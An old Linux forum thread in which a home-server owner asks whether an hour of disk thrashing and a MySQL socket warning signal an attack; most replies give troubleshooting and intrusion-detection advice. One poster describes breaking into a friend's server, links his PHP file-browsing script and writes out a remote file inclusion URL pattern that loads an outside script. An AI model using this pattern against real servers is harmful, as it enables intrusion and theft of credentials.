hacker attack?

Message

TimSSC · Post by **TimSSC** » Sat Jul 07, 2007 4:15 am

Hello. Last night (around midnight), my home server (just a converted desktop machine) started making a lot of hard drive noise (not wierd, hard drive failure noises, just regular, lots of activity noises) this went on for at least an hour and a half. During that time, I couldn't access my apache server, or even access the internet from other machines, since it is all routed through the server. I immediately got worried about some kind of hacker attack, and unplugged the WAN cable, but this still continued for quite a bit of time.

This morning, the machine was quiet, and I could access the all the services, except my drupal site, and all the other services that use the mysql database said there were too many connections, and when I rebooted, I got this message:

Code: Select all

Strange, the socket file already exist in "/var/run/mysqld/mysqld.sock"
it will be removed now and re-created by the MySQL server
BUT please make your checks.

Any how, everything works fine now, but I'm just wondering if anyone knows what might have happened, and if I need to be worried about this. I'm not positive, but it sounded like the noise was coming from my system drive (all my website stuff is on a separate drive).

Well, just looking for advice. I appreciate any help.

Ma3oxuct · Post by **Ma3oxuct** » Sat Jul 07, 2007 5:54 am

Seems like a "denial of service" attack. The other possibility is that you had some process go off that started to eat a lot of your resources by using i/o. For example, I forgot that I configured a backup script, and was cursing the lights out because I could not use my comp.

Did you check your /var/log/messages? Maybe it will show you what happen.

In terms of "hacker attacks" (other than "denial of service") they are usually done very quietly.

yuwy · Post by **yuwy** » Sat Jul 07, 2007 11:29 am

well i know that for fun sometimes ppl will nmap a server to see what open ports there are
and then use metasploit i suppose. Not sure if that may constitute the disk activity you speak
of.

Shazam · Post by **Shazam** » Thu Aug 09, 2007 10:07 pm

Well. I hope your mysql database password isn't the same than your root password.

a friend of mine had this 'problem' and now i have all access to his server.

because of some flaw in i was able to execute a php script on his server and found a database password in another php file, which had the master password for the mysql database in it, and the big mistake was, he used the same one as his root password...

sad thing, he studies software engineering ...

mudrii · Post by **mudrii** » Thu Aug 09, 2007 11:52 pm

what time did it start ?
In genttoo at around 3 AM in crontab you can find updatedb for locate. check resources with top or htop check the log and how many users are login with "w" use rootkit hunter just in case .

GNUix · Post by **GNUix** » Fri Aug 10, 2007 1:48 am

OSSEC is your friend. It is very easy to install and get running. In my experiences it works fantastic. Every time something has been "weird" with my machines in terms of security, OSSEC has picked it up and kindly emailed me about it, all the while dynamically modifying my firewall to block any attempted attacks.

Bones McCracker · Post by **Bones McCracker** » Fri Aug 10, 2007 6:25 am

a friend of mine had this 'problem' and now i have all access to his server.

Classic. So, are you sitting around trying to figure out how best to tea-bag him?

What are you like to your enemies?

Shazam · Post by **Shazam** » Fri Aug 10, 2007 7:18 am

mm, so far no 'enemy' cracked. but i guess, it depends on the hostility.
During my military service, i learned to counter means by same means. like if somebody beats you, you have not right of shooting him.

well, TimSSC,what I actually wanted to tell you is, he might have gotten access to some webserver you've been running, or at least, upload php-script to it or remotely execute it.

see, that is the script I used: http://www-users.rwth-aachen.de/gunther ... ageman.zip

with this script, you can browse trough pretty much folders on the server, as it only requires read access for the webserver, which means, if you have stuff chmoded with 664, you can read it.

I wrote this script, as a(nother) friend of mine showed me a security issue which you get, if you have a php-script which includes others, and it isn't done right.

if you set some wrong variables in your php.ini (something with fopen_allow and from some url) and a script, which is called like index.php?view=http://[url_to_bad_script]/pageman.txt, the attacker may be able to execute this script, like you installed it on your webserver.

well, and if this hacker is looking for some passwords on the server, is probably looking trough a couple of folders, and if wants a complete file list of all files you have got there, he probably causes some disk i/o. And on rather old hardware ( i simple assume it ), it could take a while.

I hope, by posting this, I'm not causing to much trouble around the globe, as you start trying this script on every server. It was originally intended, to fix file permissions on my webspace, which you couldn't set via webdav, and later on, backing up the database of mine.